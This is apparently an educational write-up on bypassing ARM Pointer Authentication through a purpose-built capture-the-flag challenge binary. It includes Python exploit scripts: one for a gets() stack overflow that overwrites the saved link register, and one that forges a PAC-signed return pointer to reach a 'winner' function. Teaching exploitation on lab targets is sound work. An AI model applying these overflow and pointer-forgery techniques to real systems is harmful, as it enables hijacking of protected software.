The latest efforts to harden software against exploitable memory corruption vulnerabilities come in the form of hardware-assisted control flow integrity and pointer authentication. Most notably, these ISA extensions are commonly referred to as Pointer Authentication (PAC) on ARM and Control-flow Enforcement Technology (CET) on Intel.
With a growing number of consumer devices embracing this generation of security mitigations, it is naturally a point of interest for security enthusiasts to become familiar with how to bypass these hardening technologies. In this post, we will cover the basics of exploiting a simple ‘Hello World!’ buffer overflow against an interactive PAC protected ARM64 binary hosted on our browser-based educational platform.
Pointer Authentication Fundamentals
The ARM v8.3-A specification introduced Pointer Authentication in 2016. Colloquially referred to as PAC, these instructions were designed to make it increasingly difficult for malicious actors to use corrupted pointers in software exploitation. As a CPU-level mitigation, it has enabled security-guarantees that were simply impossible in the past.
At its core, pointer authentication allows for the creation of ‘protected pointers’ that can be authenticated prior to each use. This is accomplished via a suite of keyed instructions that operate on a pointer and an optional context value. For the most part, these instructions simply add or remove a short “hash” that is stored in the high bits of a given pointer.
This “hash” is called a Pointer Authentication Code, hence the origin of the name PAC. Instructions which apply a PAC begin with the
pac prefix (
paciasp, etc…) and conversely, instructions that authenticate pointers begin with the
aut prefix (
autiasp, etc…). Finally, there exist a handful of PAC instructions that combine authentication with an action, e.g.
ret is equivalent to
retaa – an authenticated return.
Attempting to directly use a PAC-protected pointer will result in a fault. Similarly, attempting to pass a non PAC-protected pointer to an
aut instruction will result in a mangled pointer being returned. In theory, this ensures that if a pointer makes it through a
aut “cycle”, it has not been corrupted or tampered with.
While this is only a cursory overview, we strongly recommend reading Google Project Zero’s blogpost or this paper if you are interested in a more comprehensive description of PAC, how its keying works, and existing limitations.
A PAC Protected Binary
To provide a working example of a PAC-protected binary, we have embedded a simple ARM64 challenge into this blogpost. This interactive environment will allow you to poke and prod at PAC enlightened system + executable from a web browser while following along with this post:
By running the challenge through the debugger tab in the environment provided above, we can see the program print out a simple menu containing three possible actions:
Flipping over to the source, we can see that the
read_contract() functions do exactly what their names suggest. The first function allows us to write arbitrary text into the “contract”, while the second prints out the contents of the contract. The remaining action
finalize_contract() is used to “sign” the contract.
In true nostalgic fashion, this challenge reads user input using the notoriously unsafe
gets() function. Due to the unbounded nature of
gets(), it is just about guarenteed to introducing memory corruption.
Classical Exploitation Methods
As discovered in the previous section, we have a fairly classic stack-based buffer overflow on our hands. Let’s try to exploit this as we would if PAC was not a factor. We only need two pieces of information for this:
- The address of our target function:
- The number of bytes we need to supply to
gets()until we smash a saved Link Register (i.e. return-address)
The first step is fairly straightforward, we can navigate to the function in our disassembler and copy the address, or use our debugger to query the address directly:
wdb> p/x winner
For the second step, let’s take a quick look at the disassembly of
contract_menu() as this is the function scope where the contract structure is declared:
First, note that
x30 are being saved onto the stack via the
stp (store pair) instruction at
stp x29, x30, [sp, #-0xd0]!
These are, respectively, the Frame Pointer (FP) and Link Register (LR). Additionally, this instruction subtracts
0xd0 from the Stack Pointer (SP) before storing
x30, it does not use
0xd0 as an offset, but actually modifies the register prior to storing FP & LR. This might not be obvious to those familiar with x86 systems.
Several instructions later, we see the contract structure being passed into
add x0, sp, #0x18 mov x2, #0xb0 mov w1, #0 bl memset
From this, we know that the size of the contract structure is
0xb0 bytes, and begins
0x18 bytes above the current SP. An important thing to note here is that we cannot smash this function’s saved LR: The contract structure begins at a higher address (
SP+0x18), and “grows” towards higher addresses, meaning that we will never hit the saved LR.
However, we can corrupt a saved LR further down the stack. If we look at the disassembly of
main(), we can see it also saves LR and FP in a similar manner to
paciasp stp x29, x30, [sp, #-0x10]! mov x29, sp bl init_wargame bl contract_menu
SP was decreased by
0xd0 at the start of
contract_menu(), and we can start writing to the stack (via contract), at
SP+0x18, so the distance to the saved LR/FP pair will be
By running the simple python ‘exploit’ provided below, we will smash through the contract structure and overwrite the saved LR. Typing ‘4’ (the Quit command) to break from the menu loop will cause the program to return from
main() and consume the overwritten return-address which now points at the
import interact import struct # Pack integer 'n' into a 8-Byte representation def p64(n): return struct.pack('Q', n) # the address of the 'winner()' function winner_address = p64(0x400b04) # a simple buffer overflow to smash the saved return-address payload = "A" * 0xb8 payload += "B" * 8 # FP payload += winner_address # LR # 'run' the challenge p = interact.Process() # select 'Work on Contract' p.readuntil("4. Quit") p.sendline("1") # send 'text' p.readuntil("contract:") p.sendline(payload) # send 'name' p.readuntil("name:") p.sendline("C"*8) # release control to the user / terminal p.interactive()
But thanks to the presence of PAC, our classic link-register overwrite is stopped dead in its tracks.
We successfully corrupted LR, but when the
main() tried to authenticate it, the corruption was detected, and a mangled version of the pointer was purposely emitted with an exception bit set. We can observe the result of this authentication failure by viewing the
lr registers directly after the segmentation fault:
... |-- 'PAC auth failed' v pc: 0x8000000000400b04 lr: 0x0000000000400b04 ...
This example illustrates the basic mechanics of PAC, and how hardware-assisted pointer authentication can be used to ensure control flow integrity. While encouraging, PAC is by no means perfect. In the next section, we’ll discuss some of its limitations.
The simplest method to bypass PAC is rooted in the ability to “counterfeit” PAC pointers. If an attacker can force the target application to mint new pointers of their choosing, these “malicious” pointers can be used in place of existing “good” ones. This technique is commonly referred to as PAC forgery.
Looking back at the provided challenge, the contract signature is generated by passing the
date fields of the contract struct into the
sign_contract() function. While the source of this function has been omitted, we can navigate to its disassembly in the interactive environment to see the following:
This is simply a verbose function-level wrapper around the
pacia instruction, taking two arguments and returning the user’s “signature” for the contract. Since this “signature” was produced directly by
pacia, it can actually be consumed as a valid authenticated pointer.
While this is a contrived example constructed for educational purposes, it models what a god-like PAC-Forgery primitive will look like. Through careful control of the arguments passed to
sign_contract(), it is possible to create an authenticated pointer that can be used by our exploit to redirect control flow to the
From our exploit attempt earlier in this post, we learned that our payload must overwrite the saved return-address with a valid authenticated pointer to the
winner() function. But even with the powerful pointer forgery primitive provided by this challenge, we need to know the correct
context value to sign our pointer with.
All of the functions in this binary start with the
paciasp instruction. This instruction implicitly operates on the LR register to produce an authenticated pointer, using the current SP register as the optional
context value. This is important to note, as it highlights how authenticated pointers can be tied to a specific execution context.
By specifying a
context value, PAC instructions are able to tie authenticated pointers to very specific locations or use cases within the binary. This can dramatically reduce an attacker’s ability to reuse an authenticated pointer in a codepath where it was not intended to be used.
With that in mind, we can deduce that we must sign our target pointer to the
winner() function with a
context value equal to what the stack pointer will be when the program normally returns from
Putting It All Together
To construct the final exploit, we will first fetch the SP
context value that the authenticated return-address for
main() is originally generated with. Since we have disabled ASLR for this exercise (!) the value will be a static stack address that will be identical across all runs.
Place a breakpoint on the
main() and dump the SP register:
wdb> b * 0x400d68 ... wdb> run ... wdb> p $sp
context value and target pointer (
winner()) known, we will modify our exploit script to forge an authenticated pointer using
We will abuse the same buffer overflow from our earlier exploit, but instead of simply smashing the saved LR, we will first craft a payload that corrupts the
date field of the contract with the
context value we dumped:
import interact import struct # Pack integer 'n' into a 8-Byte representation def p64(n): return struct.pack('Q', n) winner_address = p64(0x400b04) stack_context = # TODO: follow the instructions! # craft a payload to forge a pointer forge_payload = winner_address forge_payload += "\x00" * 24 forge_payload += stack_context # 'run' the challenge p = interact.Process() # Choose to work on the contract, then send in our payload print("Working on contract...") p.readuntil("4. Quit") p.sendline("1") # send arbitrary contract 'text' p.readuntil("contract:") p.sendline("A"*8) # overflow the 'name' field to set the contract 'date' print("Overflowing name...") p.readuntil("name:") p.sendline(forge_payload) # trigger the PAC forgery by 'finalizing' the contract print("Forging pointer...") p.readuntil("4. Quit") p.sendline("3") p.readuntil("continue") p.send('\n') # ...
Next, we can call the
print_contract() function to retrieve the “signature” on the contract. This is actually the forged pointer that we created.
# ... # wait until we are at the menu, then print the contract print("Reading forged pointer...") p.readuntil("4. Quit") p.sendline("2") # save the text version of the signed pointer p.readuntil("SIGNED: ") pac = p.readuntil('\n') print("Got authenticated pointer: %s" % pac) # convert our forged pac into a "raw" form we can use in our exploit! pac_as_bytes = p64(int(pac, 16)) # ...
At this point, we’re ready to put everything together and solve the challenge! All that’s left to do is send a payload to smash main’s authenticated return-address with our newly signed authenticated pointer.
# ... # the return-address overwrite payload payload = "A" * 0xb8 payload += "B" * 8 # FP payload += pac_as_bytes # LR # send up the final payload which contains the forged return-address p.readuntil("4. Quit") p.sendline("1") p.readuntil("contract:") p.sendline(payload) p.readuntil("name:") p.sendline("C"*8) # quit the program / force the use of our corrupted LR p.sendline("4") # release control to the user / terminal p.interactive()
If all went well, we will have the contents of the flag file being printed out to the terminal.
In this blogpost, we provided the ‘best-case’ scenario for hijacking control flow of a PAC protected executable. This serves as an introductory resource for learning the basics of the ARM Pointer Authentication implementation by examining a few of its instructions and walking through one technique to bypass the mitigation.
We saw that exploiting an extremely powerful vulnerability took both additional effort, and a perfect storm of primitives to complete successfully.